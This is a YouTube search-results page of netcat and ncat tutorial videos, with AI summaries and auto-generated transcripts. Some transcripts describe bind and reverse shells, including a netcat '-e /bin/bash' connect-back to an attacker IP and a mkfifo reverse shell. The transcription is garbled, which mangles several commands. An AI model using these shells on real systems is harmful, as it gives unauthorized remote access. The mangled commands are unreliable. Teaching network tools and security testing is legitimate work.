← Back to all searches

ncat networking utility

20 videos · Jun 25, 2026

CodeLucky 1.7K views · 9:50
Dive into the world of Netcat (nc), the versatile networking utility often hailed as the "Swiss Army Knife" for TCP/IP.
AI Summary

The video introduces Netcat, a versatile networking utility often referred to as the "Swiss Army knife" for networking tasks. It can handle both TCP and UDP protocols and is commonly used for activities such as port scanning, file transfers, creating chat servers, and debugging network applications. The video covers basic syntax and options for using Netcat, including commands for scanning ports, transferring files, and setting up a simple chat server. It also discusses more advanced features like banner grabbing, remote shell access, and port forwarding, while emphasizing the importance of permission and security when using these techniques. Lastly, it suggests alternatives to Netcat for more secure or feature-rich networking tasks.

Transcript

Netcat command. The TCP/IP Swiss Army knife for networking. Let's explore what Netcat is. It is a versatile networking utility for reading and writing data across network connections.

It's often called the Swiss Army knife of networking tools, works with both TCP and UDP protocols, and is available on most Unix like systems and Windows. Common use cases include port scanning and network diagnostics, file transfers between systems, creating simple chat servers, testing network services, and debugging network applications. Let's examine the basic syntax and common options for using the netcat command. The general syntax is NC followed by options, then host name, and finally the port number.

Some common options include L which stands for listen mode and is used for setting up a server, P to specify the source port, U to use UDP instead of TCP, V for verbose output providing more detailed information. Additional options include Z40 IO mode, which is used for scanning, W for setting a timeout for connections, N to skip DNS lookups, and K to keep listening after a client disconnects, allowing multiple connections. Now, let's explore port scanning with Netcat. To perform a single port scan to check if a specific port is open, use the command nczvample.com22.

If the port is open, the output will show a successful connection. The Z option puts netcat in scanning mode with zero IO and the V option provides verbose output, giving more details about the connection attempt. To scan multiple ports, you can specify a range of ports like this. ncuzzvample.com 20 to 25.

This will scan ports 20 through 25. Use with a timeout to speed up scans. For example, ncvw1ample.com 20 to 25. It is important to always ensure you have permission before scanning systems you do not own.

Now let's see how to use netcat for file transfers. On the receiving machine, use the command nlp 1234 greater than received file.txt. On the sending machine, use the command nc192.168 21234 less than file to send.txt. This transfers the contents of file to send.txt from machine A to machine B as received file.txt.

Keep in mind that the receiving machine must be set up first. For directory transfer on the receiving machine, use the command nclp 1234 pipe tar xvf. On the sending machine, use the command tar cvf directory name pipe nc1 192 21234. This compresses and transfers an entire directory structure between machines.

Remember, Netcat doesn't provide encryption or authentication. For secure transfers, consider using secure copy protocol or RSYNC over secure shell. Now, let's learn how to create a simple chat server using netcat. On the server side, use the command nclp 1234.

On the client side, use the command NC server_1234. Once connected, both sides can type messages that will be displayed on the other end. Type messages and press enter to send. Presstrl + C to exit the chat.

To keep the server running after a client disconnects, use the command NLP 1234K. The K option keeps the server listening for new connections after a client disconnects. A basic multi-user chat can be created using the following commands. mfo/temp/ chatpipe and cattemp/ chatpipe pipe will be 1234pipe t a t a t a forward/temp/ chatpipe.

This is a simple demonstration for production chat systems. Use dedicated chat applications or or or protocols. Banner grabbing is a technique used to identify network services running on remote systems by retrieving and analyzing their banners. Banners often reveal information about service type and version, operating system details and application information.

This information can be useful for system administrators in identifying services, security professionals for vulnerability assessment and network troubleshooting. For an HTTP server, use the command ncv example com 80. Then type head/http1.0 and press enter twice. Sample output displays the HTTP version, the server type like Jinx and the date.

For an SMTP server, use the command ncvmail.agample.com25. Sample output will display the server information such as as as 220mail.ample.com extended simple mail transfer protocol postfix. Always ensure you have permission before performing banner grabbing on systems you don't own. Now let's explore remote shell access with netcat.

But please remember this is for educational purposes only. A bind shell involves these commands. On the target machine, use the command nclp4444 /bin/bash. This binds a shell to port 444.

On the connecting machine, use the command nctarget_444. The client can now execute commands on the target system. This creates an unauthenticated unencrypted shell access. Never use on production systems or without proper authorization.

A reverse shell involves these commands. On the receiving machine, use the command inp444. On the target machine, use the command ncacker_ip444 e/bin/bash. This connects back to the listening machine and provides shell access.

If E is not available, use the command rm/tempseo/temp/f semicolon cat/temp/bin/bash i2 greater than equals 1pipe nc attacker IP444 greater than/temp. These techniques should only be used for legitimate system administration, security testing with proper authorization or educational purposes. Now let's discuss port forwarding and relaying with netcat to create a simple port forwarding relay between two ports. Use the commands mifomp and insul80 less than forward sltmp/fop pipe nc example com 80 greater than forward/tmp/fo.

This forwards all traffic from local port 8080 to example.com on port 80. For UDP traffic, use the U option in LP53 less than forward/tempo pipe c UD example com 53 greater than forward/temp/fo. This creates a UDP relay for DNS traffic. Keep in mind that Netcat's relaying capabilities handle only one connection at a time, have no built-in encryption, limited error handling, and no authentication mechanisms.

For more robust port forwarding, consider tools like secure shell tunneling, socat, or dedicated proxy servers. Let's review some best practices and alternatives for using netcat. Always use netcat on systems you own or have permission to test. Consider using encrypted alternatives for sensitive data transfer.

Be aware of firewall rules that may block netcat connections. Use timeout options W to prevent hanging connections. Document your netcat usage in scripts for future reference. Avoid using netcat for persistent access in production environments.

Netcat remains a powerful versatile tool for network troubleshooting, testing, and administration. Here are some alternatives to netcat. SOCAD is more featurerich with support for secure sockets layer forward/transport layer security IPv6 and Unix sockets. MCAT is part of the map suite with added security features like secure sockets layer and authentication.

Secure shell is used for secure file transfers and port forwarding with encryption. Curl forward/get are used for http/ https specific transfers and testing. Telnet is a simple alternative for basic connection testing. Crypcat is a netcat variant with built-in encryption capabilities.

If you like this video, hit that like button and don't forget to subscribe. Visit codelucky.com for more such useful content. [Music]

https://www.youtube.com/watch?v=Di4DJHVZzFM
SecureRandom 7.9K views · 11:17
An introduction to Ncat. 0:00 Intro and Installation 0:39 Connecting to a port 1:57 Listening for connections 3:14 Transferring a file ...
AI Summary

In this video, the host introduces ncat, a tool developed by the Nmap team that functions similarly to netcat but includes advanced features. The tutorial covers how to install ncat and demonstrates its basic functionalities, such as establishing raw TCP connections to verify open ports on servers and listening for incoming connections. The host also illustrates how to transfer files between computers using ncat, including copying entire disk images, and emphasizes the importance of using the SSL option to encrypt data transmitted over the network. Additionally, the video shows how to create a bash shell session over ncat, highlighting its versatility. For further learning, viewers are encouraged to consult the ncat man page for more detailed information and examples.

Transcript

welcome back everybody today we're going to be taking a quick look at the ncat tool which is similar to netcat except it's the nmap team's implementation of it and it comes with several advanced features that the other tool doesn't have in its simplest form it can make a raw tcp connection and it can also pass basically any stream that you send it to another computer or receive one which you'll see in our examples in just a moment so to get started with it the first thing you'll need to do is install it and you can do that with sudo apt install ncat and i already have it installed so the first thing we can do with ncat is make raw tcp connections to ports on servers and a good use for that is to verify findings such as if you do an nmap scan so if we run in map against one of my servers give it a second to complete if we scroll up we can see that we have port 22 open ssh and we have port 43 open nginx and 9001 so we can confirm the findings on these if we open up another window and we can do ncat server 03 and then the port that we want to check so 22 we can confirm that it's ssh we can try 443. uh we can confirm that this one is engine x and then we can take a look at 9001 also see if there's anything on that and that one's not returning anything besides making connections ncat can also listen for connections so if we clear out of here we can do ncat slash l which will have it listen and if we do sudo ss lpnt enter our password and then make this a little larger for you we can come down here and we can see that ncat is listening by default on all listening interfaces and on port 33 or three three seven so elite so with this listening we can use another ncat session to connect to it but first let's put it into verbose mode so you can see the connection and then we'll use ncat again specify the host that you want to connect to and since we're using the default port we don't need to specify the port and you see we have a connection from the local host and then we can talk back and forth so we can say hey i'll switch what's up and then some random text and you can see that it passes it back and forth so with this information let's go ahead and try something a little more interesting so i'm gonna in that session and i'm going to ssh into one of my servers so server o4 so on the host machine i am going to pass a file to it and we're going to transfer it over to my server so i'm going to change directory into devshem and you can see here that i have test.txt and if i cut it out you can see this is some sample text more sample text in the final line of sample text so we're going to use ncat and we are going to connect to that server so server 04 and then we are going to pipe in the test.txt oops i need to start the listener first on the server so we're going to use ncat and then listen and pipe it out to we'll call it out.txt and then we'll rerun this and then over here on the server you can see that i now have out.txt and i can cat it and you can see there is my text so that's how you transfer a file you can also pass files directly into a text editor or a pager so for example we can do in cat slash listen and pipe it into less and then we can use ncat server 4 uh actually we'll do uh cat etsy passwd pipe that into that and then you can see over here on the server we've passed it directly into less and we can view the file the next thing we can do is we can actually copy over entire hard drives or disk images from it so here on the server i have let's see dev sd b so i have dev sdb and it's a one gigabyte disk so i can do dd input file is equal to dev sd b and then pipe that into ncat going to 1.2168.1. and then i need to start my listener first so we're going to do ncat slash listen and then we're going to pipe that into dd and then the output file is going to be dev shim and we'll call it out.dd and then we'll start that on the server and of course i need sudo to read that file so we're going to use sudo bang bang enter the password it's going to take just a moment for it to copy over to my computer now that it's copied over we can use sudo md5 sum on uh dev sdb let that calculate and then we can use sudo md5 sum on out some on out dot if i can type out.dd let that calculate and you can see that the hard drive is cryptographically the same so it made a perfect copy of it so one important note is to know that by default all of this is happening in clear text so anything you pass between the two computers anybody sniffing on the wire will be able to see it so if we open up wireshark and we start a capture here on eth1 and then we do a ncat slash l and ncat server04 and we do test test test uh password equals password username equals user and then we stop the capture and then we filter for our connection and we follow the tcp stream you can see everything that we sent over netcat is in clear text so test test password equals password and username equals user so in order to avoid that we want to use the tactac ssl option in netcat so let's go ahead and start a new capture so we'll continue without saving we'll use use use tactac ssl clear this out tactac ssl need to hit enter to actually start it and then we'll do test test test password equals password username equals user and then we'll come back over here and stop the capture and then we will filter for tcp port equals three one three 337 and take a look at it and now you can see that it's using tls 1.3 1.3 1.3 so if we do another follow tcp stream you can see everything that we sent is now encrypted the last thing i want to show you is how to pass a bash shell over in cat so on our workstation here we're going to use ncat slash listen and over here on the server we're going to use ncat tactac exec and then slash bin slash bash and then we're going to connect back to our workstation and if i can spell that right and over here it's gonna look like nothing happened but if i do an ls you can see the file if i do a who am i you can see that i'm nathan and if i do a hostname you can see that i'm on server four so i do have a shell it's just not showing you a ps1 because i don't have one because we have a raw bash connection so if not having a proper ps1 bothers you we can always upgrade to a proper shell by using this command we can use python3 uh import pty dot spawn we're gonna use bin pty dot spawn we're gonna use bin bash and it will upgrade us to a proper shell what i showed you today just scratches the surface of what you can actually do with ncat but if you want to learn more i would direct you to their man page which is very well put together so we can do man in cat and when you scroll through here you can see what all of the options are and if you jump down to examples they also give you examples of how to use the commands and what's possible with them so that's a quick look at ncat remember if you found this video helpful be sure to like and subscribe thank you

https://www.youtube.com/watch?v=z5VpcBMUAS4
The Intel Lab 40.4K views · 2:34
Netcat is an insanely powerful tool, but in this short video, I'm going to show you how to set up a listener and then connect to it so ...
AI Summary

The video introduces Netcat, a powerful tool for enabling communication between computers on the same network. It demonstrates how to set up a listener on one device and connect to it from another using simple command-line syntax. By using Netcat, users can send messages back and forth between computers without relying on traditional messaging apps. The video encourages viewers to explore Netcat further by reading the manual and experimenting with its features. Overall, it highlights the simplicity and effectiveness of using Netcat for direct communication between devices.

Transcript

so i bet you didn't know that computers can talk to each other say what of course you did that's how the world works these days but how do we play with it and how do we learn it from the ground up one tool that you're going to come across in your hacking journey is neck cat without a doubt one of the best and most powerful tools in your arsenal you can use it to do so many things and what i'm going to show you here is the absolute basics of netcat how to get two computers on the same network talking to each other so let's have a look this computer here is the mac mini and and and over here off camera i have a macbook air i know the ip address of the macbook air i can set up a listener on the macbook air that will listen for incoming connections from any other device on my home network so the syntax is nc l l l to set up the listener and then you have to specify a port and we're going to use port 1337. so the macbook air is now listening on that port and back on the mac mini we are going to connect nc nc nc 168 1 132 that's the ip address of the macbook air air air and we know it's port 1337 and it looks like nothing's happened and even over on the macbook air it looks like nothing has happened but if i type hello you can see that that message has now appeared on the macbook air and if i move over to the air and type goodbye boom it's back on the mac mini so you could be sitting in your home talking with your family members your friends not even using the wider internet like whatsapp or imessage or facebook you're just in terminal having a chat that is the power and the simplicity of netcat so that's it netcat super powerful what you just saw here is the absolute basics go and check it out read the manual have a play

https://www.youtube.com/watch?v=9g17KWZHWc0
Remote IT Support 657 views · 2:11
Ncat can concatenate and redirect sockets. In this video I show you can example of data piping over a specified port. Ncat also ...
https://www.youtube.com/watch?v=j27XfWRke1c
shanewit2012 1.6K views · 8:45
Best Viewed in HD (1080p). This lab covers ncat for simple data transfer, using the pipe with ncat, ncat for file transfer over any ...
https://www.youtube.com/watch?v=CGaGwiIFAyw
Paul Tedesco 839 views · 1:20
Disclaimer: I am not responsible with what you do with this knowledge Please don't break the law!!!!!!!!!! Stay Ethical!!!
https://www.youtube.com/watch?v=JZap5kaqB-c
InfoSecGeeks 702 views · 44
Ncat is described as “a feature‑packed networking utility that reads and writes data across networks from the command line.” Ncat ...
https://www.youtube.com/watch?v=lx3-WapvtlE
NCAT Videos 81 views · 1:28
The NCAT latency tool benchmarks end-to-end round-trip latency between two user-selected points for constellations with ...
https://www.youtube.com/watch?v=mIp8RMGktjQ
Lim Jet Wee 3.4K views · 6:31
Kali Linux - Ncat - Listen To A Port limjetwee #limjetwee #kalilinux #cybersecurity #network #ncat.
https://www.youtube.com/watch?v=zoKibvF_zvc
SecureRandom 2.5K views · 14:57
Advanced ncat tutorial. Support the channel: BTC - 3NzWDDH3n5PsBKqWJyAb7rvsGvJKxcAPFv Follow me: SecureRandom on ...
AI Summary

In this video, the presenter explores advanced features of ncat, a networking utility. They demonstrate how to restrict access to a listening ncat server using allow and deny options, allowing only specific IP addresses to connect. The video also covers enabling multiple simultaneous connections, logging traffic to an output file, and securing connections with SSL certificates to prevent man-in-the-middle attacks. Additionally, the presenter shows how to execute custom scripts and send HTTP requests through ncat, as well as using ncat as an HTTP proxy. Overall, the video provides practical insights into enhancing security and functionality when using ncat in networking tasks.

Transcript

welcome back everybody today we're going to be taking a look at ncat again but this time we're going to be using some of the more advanced options that it offers if you haven't already seen the first video go ahead and watch that and then come back to this one because that will give you a good starting point so with that let's go ahead and hop in so the first thing we're going to do is limit who is allowed to connect to a listening ncat server so by default over here on server 4 which is 192.168.1.20 and over here on the left is my workstation which is 192.168.1.3 so over here on the server if we fire up ncat we do listen in verbose mode and we come back over here into the workstation and we do ncat192.168.1.20 it's going to allow anybody to connect to it and that's not good um when you're actually on a production machine because then like i said anybody can connect to it so there's two ways to limit who can do that we can use the allow or the deny and we can even use use use a combination of them both so starting with the allow option this kind of works like an acl in a switch to where you put in the list of allowed ip addresses and then there's an implicit deny at the end so we're going to do ncat and then listen verb verbose allow and my ip address from the workstation is 192.168.1.3 so i'm going to allow an ip address that is not that so 192.168.1.4 and now we're going to come back over here and we're going to try to connect to it again but our ip address is not in that allowed list and you can see that we get new connection denied not allowed so if i try to send some information to it you see that nothing goes through so let's go ahead and close this connection and allow that ip address so we're going to change it to 1.3 this time we're going to come back over here into the workstation and rerun that command and you can see that this time the connection went through and we can pass data back and forth we can also create an allow file and a deny file which works much the same way so here on the server i have a file called deny.txt and you can see in the file i have individual iep addresses and then i also have an entire network range which is insider notation so we can do ncat slash lv for listen vermost verbose mode tactac deny file and then deny.txt and then anything that's in that file will be denied and then we can also do the opposite we can change this to allow file and now anything that's in that file will be allowed and everything else will be denied the next thing we're going to look at is allowing multiple simultaneous connections so by default again if we fire up ncat and we do lv and we come over here to the desktop and we connect to that server again we can only have one connection so well let's not do that let's go horizontal we'll go in cat 192.168.1 and it will try to connect again you'll see that connection is refused because it can only handle one connection at a time so in order to fix that we're going to clear this out we're going to relaunch it but this time we're gonna use the slash m for multiple connections and we can give it any number that we want we'll just say 40 connections at a time and then we also have to give it another option which is dash k which is for keep alive so now if we come back over here we can close this out we can connect with one uh test one we can come down here to the second one connect and say test two and you can see that we have two connections running simultaneously now and with the option that we use on the server we can have up to 40 of them next we're going to look at saving all the traffic that goes across ncat in an output file so this one's pretty simple we're going to use ncat uh lv for listen verbose and then dash o for output file and we'll call it uh out.txt come back over here and reconnect to the server and then we'll go test one two three four five close it out and then we can cat out the output file and you can see that it records all of the transactions that go across ncat so this would be useful if you're doing a pin test or any sort of auditing and you need to have a trail of exactly what happened on that connection all right so our ncat connections are getting more secure we're limiting who is allowed to connect to it we can have multiple people using it at the same time now we're logging our output so now we need to encrypt our connection and verify that we're actually connecting to the correct server and that there's not a man in the middle attack going on so the way that we're gonna do that is we're gonna use a custom ssl certificate which i've already generated i'm not going to generate that for you there's a lot of tutorials on youtube and online already but i'll show those to you if we do a ls slash l you can see that i have the key.pim and the cert.pim and they're just base64 encoded a certificate so if i cap the assert for you you you you can see it here that's what we need and then we also need the cert over here on the desktop so if you take a look i also have the cert here because we'll use that to verify our connection so over here on the server let's fire up our listener so we're going to use ncat lv for listen verbose tactac ssl and this time we're going to specify our certificate so tactac ssl hyphen cert and then it's going to be the cert.pim and then we need to specify our key so tactac ssl hyphen key if i can type and then key.pim and then we're going to come back over here to the desktop and we're going to verify that we are connected to the correct server so i'm going to mess it up for you the first time just so you can see it and then we'll do it the correct way the second time so if i do ncat and i try to connect to it by ip address because in the certificate you should have the common name for the server so for this one it's going to be server 4.home.local so if i use the ip address it's not going to authenticate it so we'll do verbose tact ssl hyphen verify tactac ssl and then the trust file and then the trust file is the certificate.pim and if we take a look at it you should see that we had a connection error here a certificate verification error that's because the 192.168.1.20 did not match the common name of server 4.home.local so if i rerun this but this time i change the ip address to server04.home.local it will match well if i restart the connection and then reconnect it'll match this time and then you can see test test one two three four and that's how you make sure that your connection is not getting man in the middle all right so let's go ahead and put together what we've learned so far so we're going to clear out of these and we are going to use a reverse shell from this server or actually just a regular shell from the server and then we're going to connect to it but we're going to do it using ssl we're going to verify the connection we're going to allow three simultaneous connections and we're going to limit it to just a single ip address so the way we're going to do that is we're going to use use use ncat exec and then we're going to do bin slash bash and then m we're going to allow three connections k keep open tact allow we're gonna allow the ip address of my workstation we're gonna use ssl we're gonna use ssl cert and then it's gonna be cert.pim we're gonna use ssl key and then it's going to be key.pim and then we're going to put it in listen mode and then we're going to reconnect to it and now we have a secure connection and a reverse shell so if i run ls or who am i you can see that i'm nathan hostname server04 so we are allowing multiple connections we're limiting it to the ip address of just this workstation it's running over ssl so it's encrypted and then we verified the certificate to know that we've connected to the correct server so let's move on to some more interesting things that we can do with ncat so let's go ahead and clear out of this come over here to the server clear it out so we can also run custom scripts through ncat that take a user input so if we take a look here at a script.pi you can see we have a super simple python script where it just says welcome to my server what's your name it takes the user's input and then it prints it out to them so we can run this by doing ncat slash lv and then tactac exec and then we're going to say home nathan script.pi and then over here on this one we're going to reconnect to our server 1.20 you can see as soon as i connect to it it's going to say welcome to my server what's my name i'm going to type in nathan and then it echoes back to me hello nathan so we can use custom scripts and do basically whatever it is that we want over that connection uh one of the other interesting things that we can do is we can pass uh http uh requests over ncat so if we clear this out you can see that i have a file um called get here on my desktop and you can see that it's a get slash iphtp 1.1 and the host is ip.info.io so if i try to do a ncat tactac ssl ipinfo dot io and then on port 443 and if i do git slash http slash one dot o you can see that um it's 404 not down because ipinfo.io is a virtual host on the server so we have to special specify the host that we want to connect to when we make that request and we can do that by creating this git file so if instead we cat git and then pipe it into ncat and then tactac ssl ipinfo.io on port443 you can see that it returns all the proper information as well as our ip address here at the bottom so jumping out here into the desktop i want to show you that you can also use the the the ncat server the listener as a http proxy so in order to do that you would use the ncat slash l for listen you can specify a custom port if you want to in this case i'll use 8080 but by default it'll still use the 31337 port and then you're going to use the tactac proxy type equals http so we'll fire that off we'll come over here to firefox and you can see here in fro fro fro foxy proxy i already set it up so we can take a look at that i called it in cat hyphen server 04 proxy type is http the server ip address is the 1.20 so the server 004 and then that custom port that we put in 8080. so we'll save that we can open up a new tab tab tab and if we go to say reddit.com it'll take just a second and then you can see that it proxied our connection through the http server to reddit so back in the terminal now we can take a look at sending our client requests through a proxy and the client unlike the listener does support sox4 sox5 and http so in order to do that you would use the ncat tactac proxy hyphen type and then from here we can specify http or we can do socks 4 or sox5 so we'll say sox5 for example and then you would use the tactac proxy and then you would put in the ip address of it so it would be the host colon and then the port so for example it would be 127.0.0.1 and then we can say one two three four for the port and then you would have to specify where you want to connect to um so it would be say reddit.com again and then i don't have a listening socks 5 server so this one won't go through but if you did have a working sox5 server such as tor or one that you paid for it would connect and then it would forward your traffic through there and those are some advanced ncat commands that i thought you might find helpful remember if you did find them helpful be sure to like and subscribe thank you

https://www.youtube.com/watch?v=ajPvCjIKrE0
NCAT Videos 90 views · 1:53
The NCAT mobility tool performs detailed, dynamic analyses of satellite constellations' supply and demand bandwidth for mobility ...
https://www.youtube.com/watch?v=E1XhBY5ml6o
Back From The Ether 8 views · 33:25
In this video, we dive deep into **Ncat**, a versatile and powerful tool in the world of cybersecurity! Whether you're an ethical ...
AI Summary

In this video, Nick Dero, a professor of Information Technologies, introduces netcat, a versatile command-line tool commonly used in networking and ethical hacking. He explains its functionality as a client-server application that can listen for connections on specified ports, allowing users to read, write, and redirect data. Through demonstrations, he sets up a server on a Linux machine (Tokyo) and simulates an attack from another machine (Godzilla), using tools like nmap to discover open ports and Wireshark to monitor network traffic. The video emphasizes the importance of understanding the TCP three-way handshake during connections, showcasing how netcat can facilitate communication between machines on a network. Overall, viewers gain insights into practical applications of netcat and related tools in network testing and security.

Transcript

hello everybody this is Nick dero professor of information Technologies and computer science Lakeland Community College let's talk about netcat uh netcat is another one of those uh very small footprint command line tools that uh is native a lot of times in Celly I mean it's readily available there it was normally written for the Linux Unix environment has been ported over to the windows environment uh you'll see it in networking you'll see it in um ethical hacking all right so let's get start by let's go up through my screen and let's take a look at just the general concepts of netcat and then I will do some demonstrations using that tool all righty um this is uh this variation of netcat is created by the uh people at end map uh they call it your what do you call call it um general purpose or a Swiss army knife well they call end map a Swiss army knife so a lot of these tools have um very simple functions but you can use them in a variety of way if I was just to scroll up and read some of this um we could use it for testing we could use it for establishing connections you'll need it a general purpose command line tool for Reading Writing redirecting uh encrypting data across ports we can control what port reports it's going to use uh generally speaking you'll hear me talk about the client server side to it um the the the server side means that we're running some kind of program and it's waiting for some kind of uh connection the client side is obviously the client they're requesting some kind of communication and what we could do with netcat is we can simulate that we can use obviously use it as a tool um but we could also simulate it so I think the best thing to do is just kind of go up to my test environment I'll shrink this down and in my test environment just as I was coming to it now my test environment you'll see it many times it changes over time it's my little homage to uh Godzilla if you've seen other videos of mine he's one of my favorite monsters when I was growing up so this is a little homage to God uh but it actually reminds me of something so as I'm going back and forth between the two screens uh on my left hand side we have Tokyo beautiful city huge massive I think it I'm pretty sure it's the world's largest city by population I think it has like 36 million people just in it um and then on my and this is just a Ubunto machine um and on my right side in red I have Godzilla now to again as an homage uh I'm always going to treat my Cali machine which is the Godzilla machine as a attacking Tokyo so Tokyo will be the victim machine lot of this now with netcat there's not a lot of you know uh victim Target type uh talk but in other videos in this video I'll I'll bring this up easy to remember that we have um one side you client the server side or the target side or victim side and then uh on the on the left side we have God Zilla which is the attacker side uh let's start uh fairly simple and let's just open up um a netcat communication Port over here in Tokyo so my Tokyo machine my abunto machine is going to be a server right I'm going to open up a service on this machine give it a second and pay particular attention I'm logged in as endo that's my username and the Machine name is Tokyo that's going to come into play in a bit and I'm going to keep it real simple here I'm just going to say ncat listen on Port 8888 uh if you remember our well-known ports uh the TCP and UDP well-known ports I'm just going to randomly pick a p Port here that is going to be fairly easy for me to remember right I don't want to pick any of the well-known ports uh those first 1,24 ports so I'm going to you know the registered ports I think up to 49,000 so I'm just going to pick um 888 it's going to be easy for me to um view that so now what it's doing the server side the Tokyo side now what it is doing is it's just waiting it's kind of like um if I was to open up a web server the web server is going to be waiting for some kind of communication well netcat DL stands for listen listen on Port 888 is just listening for some kind of communication now this is fundamental this is not anything significant just says open up Port 888 and listen to some kind of communication so now let's go over to my Godzilla side or my attacking side and let's go to a command prop terminal machines are running a little slow okay there it goes and uh just so we we understand what's going on I am if we look right here I am logged in as the username C on the machine Godzilla over here username Ender on the machine Tokyo over here on Godzilla it's C at Godzilla now we can do uh several things but I I want to use these videos not just to look at one particular tool but maybe look at a variety of tools and what I want to do is I don't know let's pretend I don't know um the IP address or I know nothing about Tokyo over here I know they're on the same screen but I don't know anything about them so I'm going to bring out our old friend end map and to save a little time I'm not going to do a big scan on end map I'm just gonna say I know what network I'm on uh so so scan for Life uh on 10.0.0 do from one to 10 so it's a little bit quicker and sure enough I found a couple hosts uh this is interesting the 10.0.0 one that's the pfSense or my firewall uh this happens to be the the Godzilla machine 10.0.0 two and then we have this m stream machine at 10.0.0 n again let's look at some other tools and again let's look at nmap and let's do a port examination on 10.0.0 N right again I can do them to all of them but it it's a small Network and I don't want to spend the time uh scanning so let's do a search on this all right so this is now telling me that on the um computer of 10.0.0 n there is an open TCP Port 888 right 8888 so that might be of something of interest to me it also says his son answer book I may do some research on what may potentially be running on that okay so we know there's an open port now I'm going to do something a little bit interesting at this point I'm going to expand this window going to cover up Tokyo for a second because there's going a couple things that I want to be running on it let my machine refresh and one of the things I want to do my machine is running very slow I move this over and I'm going to fire up wire shark another tool that we often use wire shark is just a uh packet Gathering uh software it's a very powerful software but it's packet Gathering we can look at traffic on the on the given network uh and other things so I'm going to say where is wire shk I'm just going to type it how about we save a little time Nick instead of looking for it so I'm gonna say wi shark and it's going to launch up it'll launch up the guey now if I had several network cards on this machine it would show me the different cards since I only have one the e eth0 I'm going to say gather information uh from that particular you notice that nothing's really happening occasionally you might see traffic coming back and forth on this and that that's fine uh if I was to open up another terminal and something of interest you notice as soon as I opened up that terminal I apologize that my machine is running so slow as soon as I opened up that terminal a whole bunch of network traffic was was generated right I don't want to see that I'm doing something specifically so what I'm going to do is I'm going to go back to Wi shark and I'm going to restart the capture and I'm not going I'm going to continue without saving all this stuff all right so it give it a second so wire shark is just listening to the traffic on my network you may see it in other labs you may you will definitely see it in other uh demonstrations that I do I'm going to go back to my terminal machine and what what I want to do is I just want to make a simple connection over to that um to Tokyo so I want to do a netcat connection I'm going to say netcat and I'm going to give it the IP address of the computer that I found and I'm going to have to tell it what port and this is important to what port to communicate with so if you remember I did 8888 I discovered that with nmap so 8 88 and refuse connection I wonder if my good chance the netcat had issues so let's go back to Tokyo for a second yes it did could have timed out not a problem and I'm going to launch it again okay and sitting there waiting for a communication I'm going to go back and I'm going to uh restart this if my machine would just speed up just a little bit and I'll go back to my soon as it clears the screen go back to my terminal emulator and I'm going to do the netcat again 10.0.0 n Go to Port 888 and this is what I wanted before we go any further I'm going to go back to wire shark and I'm going to move my screen over just a little bit so you can see everything and I'm going to stop the capture I don't want any more traffic right now so I'll stop the capture I want you to notice these first three lines um they're fairly important you hear me discuss this topic all the time but I wanted to point it out in a live situation there is your TCP 3-way handshake so if I look at it the source my Cali machine Godzilla 10.0.2 reached out to uh the target machine Tokyo 10.0.0 n and it requested a connection on Port 888 so the first part of the three-way handshake it basically sent a sync packet right here you see that right here and what what happened after that the server Tokyo said hey that port is open I'm okay listen you listening or communicating with that Port so 10.09 responded back the second part of the handshake with 10.0.2 and saying yeah here's your sync acknowledgement and there's a bunch of little things going on with sequences and stuff like that and then finally if we look right here the client Godzilla established that TCP connection it sent the acknowledgement so that three-way handshake um the client requesting or synchronizing the server acknowledging uh back with the synchronous and then the client eventually establishing that connection um you see that I use basically use netcat as a little bit of a demonstration a network demonstration of um all the stuff that's going on now I'm going to turn off wire shark cuz my machine's running little slow I just wanted to show that first um three-way handshake maybe this will help with my machine not running so slow I'm going to get there I'm going to quit without saving now one of the nice things about wire shark is I can can let it run for hours and then just save that data to a file and I can look at that file at another time all righty now what I'm going to do is I'm going to double up my screen again I'm going to close this one oh it's already closed just so it's not there I just want one terminal window open okay so let me clear this screen did it mean to clear the screen um I kind of jumped ahead here uh here is Godzilla and here is Tokyo you notice that I typed the word clear and it showed up over here on Tokyo that is because I apologize if it's a little confusing um that is because Tokyo opened up a service opened up the netcat service listening to Port 888 and then Godzilla which was the client established that communication uh by doing netkat 10.0 8888 when I typed clear all that's going on with this service is it's listening to the traffic going between the two things uh it's kind of like a cheap little chat nothing really significant is going on here so if I was to type the quick brown fox and then I hit enter you'll notice over here on the Tokyo side it says the quick brown fox if I was to do the same thing on the Tokyo side and I say hello from Tokyo you'll notice that it's popping up over here on the Godzilla side and Godzilla will hello whop on the Godzilla side hello from Godzilla enter and away it goes so we now know that there's communication going through that Port 88 88 on the Tokyo side that would be a fairly boring you know use of net cat you know they're very proud of its tools and the things you can do yes we can test ports we can uh theoretically put a lot of traffic through that part and and see about throughput we can test um routers and IDs systems with with netcat um but let's look at I'm going to break the communication and uh over here I'm going to start working over here back on Godzilla one of the things I can do is I could use netcat for a little open source intelligence a little footprinting right um because it is just going out and communicating or establishing a connection with a port now I happen to use 8888 but what if I wanted to St establish a connection with a other port for example if I wanted to establish a connection with Port 80 we know that Port 80 is the HTT P Port maybe there's a way I can gather information what we call Open Source intelligence footprinting maybe I can gather information about a real website out there so I'm first thing I'm going to do is I'm going to say uh and map and I'm going to do a real website here I'm going say ww I'm you know what I'm going to say what ports are open- St on site www. zon transfer. me give it a second it's going to take a little bit because now I'm actually going out to the real internet there is a website out there called zon transfer. me uh in which we can test DNS enumeration and DNS footprinting and things like that so I've decided to use that it's it's an established server so I'm not hacking anybody or doing anything illegal uh I'm basically finding out the information about a server that is out there so let's give it a little bit of time okay so let's see what uh the end map had to say with the Zone transfer here you know what I'm going to make my screen just a little bit bigger we come back to Tokyo all right I make my screen just a little bit bigger so we can see the entire line there's always Jeopardy of me slowing things down a little bit but I do stuff like that and I'm going to make this screen just a hair bigger so a little bit easier to read okay so ww wzon transfer.

me has Port 80 open and Port 443 of course it has those ports open those are the HTTP and https or the web server ports that we are open but I want to use netcat to do a little bit of fingerprinting open source investigation can I find out information about um the zon transfer. me well I noticed that uh doesn't give gave me back an IP address I'm going to use the IP address here so I'm going to say uh ncat and this time we're going to say uh 10 3. 224 do 212 dot 213 that's just this particular IP address right here and I have to tell it like just like I did it with Tokyo I have to tell it what port to establish a communication to um since I I'm curious about the HTTP I'm going to do Port 80 I know that's not uh a secure Port so I'm going to say 80 so all I'm doing is I'm telling netcat to establish a connection with the the the 10322 . 212.

